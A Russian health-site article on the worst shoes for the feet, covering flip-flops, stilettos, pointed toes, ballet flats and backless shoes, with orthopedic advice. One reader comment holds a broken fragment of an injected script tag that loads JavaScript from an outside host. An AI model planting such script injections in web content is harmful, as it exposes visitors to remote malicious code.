Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Худшая обувь для ваших но...  >>  Худшая обувь для ваших ног
 
Обратная связь
 

Худшая обувь для ваших ног

Размер шрифта
28 февраля 2011 00:00
  • google_analytics: false
  • Нравится

Шпильки, балетки, вьетнамки ... самая модная обувь может быть опасной для ваших ног. У каждой женщины, есть, по крайней мере, одна пара обуви, которую она абсолютно обожает. Некоторые могут похвастаться дюжиной любимых туфель. Лично мой промах – великолепная пара оранжево-розовых замшевых туфель Prada на головокружительных каблуках с заостренным носом, которые я купила несколько лет назад на грандиозной распродаже.

Эти туфли моя очевидная неудача, потому что они совсем не подходят для моих ног. Достаточно взглянуть на них лишь однажды, чтобы понять почему. Как можно засунуть пять пальцев в пространство, где умещается только один?

Шпильки высотой с небоскреб, сабо с открытой пяткой, или балетки без супинатора – предостаточно обуви, которая способна уничтожить ваши ноги.

Так какая же обувь абсолютно не подходит для наших ног, нанося серьезный вред – от сухих мозолей до повреждения нервов. Возможно, вы будете удивлены, но наихудшей обувью ортопеды считают не шпильку и даже не заостренный нос. Знакомьтесь, опасные преступники…

Шлепанцы

Многие женщины носят вьетнамки каждый день. Хотя они предназначены исключительно для пляжа и для бассейна, но никак не для длительных прогулок. Шлепки не обеспечивают своды стоп необходимой поддержкой, поэтому со временем ноги повреждаются.

Носить вьетнамки от случая к случаю не возбраняется, главное не переусердствовать. Но вероятность повреждения ног увеличивается в разы, когда вьетнамки используют не только для прогулок: в них, например, догоняют поезд, прыгают или играют в футбол. Травматологи и хирурги каждое лето констатируют травмы ног из-за неправильного использования вьетнамок и кроксов.

Вьетнамки натирают кожу между пальцами, заставляют лодыжку быть в постоянном напряжении, не защищают пальцы, что может легко привести к перелому – достаточно споткнуться в них об камень. Кроме этого, они подвергают ступни таким серьезным проблемам как развитие тендинита – дистрофия ткани сухожилия и подошвенный фасцит.

Решение: Если вы не на пляже, носите сандалии, а не вьетнамки – ремешки, по крайней мере, надежно фиксируют ногу.

Вторая угроза ваших ног это… шпильки.

Шпильки

Но возможно вы уже знаете, в чем опасность, не так ли?

Чем выше каблук, тем выше поднимается пятка и вытягивается стопа. Но наши ноги не готовы длительное время находиться в таком положении. Так какой же размер каблука представляет очевидную опасность?

Все, что выше пяти сантиметров вызывает проблемы – убеждены ортопеды. Ахиллесово сухожилие вынуждено постоянно сокращаться, если нога балансирует на высоком каблуке. Если носить шпильки слишком часто, есть большая вероятность развития ахиллесового тендинита.

Когда вы носите шпильку, ваш голеностопный сустав испытывает повышенное давление. По этой причине прослойка жира под голеностопным суставом истончается. Это может привести к метатарзалгии – острой боли в голеностопном суставе, которая рискует перерасти в хроническую.

От неправильной обуви может пострадать вся ваша жизнь. Боль в ногах меняет походку, потом появляются боли в спине. Плохое самочувствие вызывает стресс и вот уже качество жизни не то, что было прежде. Здоровье всего, что выше ступни, зависит от того, что находится под ней.

Решение: Носите высокие каблуки как можно реже, только для специальных событий, и снимайте их уже по пути домой. Вы также можете уменьшить давление на голеностопную область пользуясь специальной, выполненной на заказ, гелевой стелькой. Откажитесь от обуви на высоких каблуках с заостренными носками.

Она следующий претендент на звание худшей обуви…

Обувь с заостренными носами

Риск травмирования ноги увеличивается многократно когда обувь на шпильке дополняется узким носом.

Кроме метатарзалгии, искривленных пальцев, сухих мозолей и отеков, узкая обувь может вызвать неврому – воспаление нервов. Наиболее распространенно это заболеванием между третьим и четвертым пальцами, но может затронуть и другие. Малейшее прикосновение к пораженному участку вызывает острую боль и жжение. Лечение невромы предусматривает инъекции, физиотерапию, и даже хирургическое вмешательство для удаления воспаленного нерва.

Решение: ищите обувь со свободной носовой частью. Для стопы нет ничего хуже обуви, которая сжимает ногу в неестественном положении. Но если вы не представляете свою жизнь без таких пар – носите их как можно реже.

Круглый нос и никаких каблуков, казалось, что может быть лучше? Однако, мягкие балетки не такие уж и безобидные какими кажутся на первый взгляд…

Балетки

Вы не поклонница балансировать на головокружительных каблуках и терпеть не можете обувь с узкими носами. Ваши ноги отлично чувствуют под собой основу, а пальчики удобно «спят»? Что же в этом плохого?

Балетки не обеспечивают ногу должной поддержкой, им не хватает амортизации, что не позволяет ступне функционировать так, как надо. Они отличаются от вьетнамок тем, что защищают ногу от внешних повреждений, но риск появления тендинита, подошвенного фасцита и других заболеваний не ниже. Балетки также не предназначены для ежедневного ношения.

Решение: Выбирайте балетки с твердым задником. Как определить насколько хорошую поддержку они дадут вашей пятке. Сожмите задник рукой, если он собирается в вашей ладони как бумага – оставьте модель на прилавке. Если держит форму – значит задник твердый.

Шлепки с открытой пяткой

Много проблем стопе доставляет задняя часть обуви. Но хуже всего, когда ее нет вовсе. В таком случае пальцы рефлекторно цепляются за обувь, что способствует возникновению так называемого молотообразного пальца. А еще можно получить мозоли и трещины на пятках.

Что же тогда остается? Качественная, удобная спортивная обувь самый лучший вариант для наших ног. Жаль, что ее не всегда можно носить. В качестве ежедневной обуви в офисе ортопеды рекомендуют туфли с нормальным или слегка зауженным носом и каблуком не выше 5 сантиметров, и обязательно с задником. Главное, чтобы обувь была надежной опорой стопе, обеспечивала хорошую поддержку сводам стопы и была широкой в носовой части. В идеале, если на туфлях будет ремешок или шнуровка для надежной фиксации лодыжки.

Куча денег тратится на исследования, которые подтверждают давно известную истину: если ваши ноги чувствуют себя в той или иной паре комфортно, значит эта именно та обувь, которая вам нужна. Но если обувь причиняет боль – снимите ее как можно быстрее и никогда больше не надевайте. Это так просто.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 21:25

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

01 июля 2015 в 00:19

Комментарий удален за нарушение Правил общения

Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.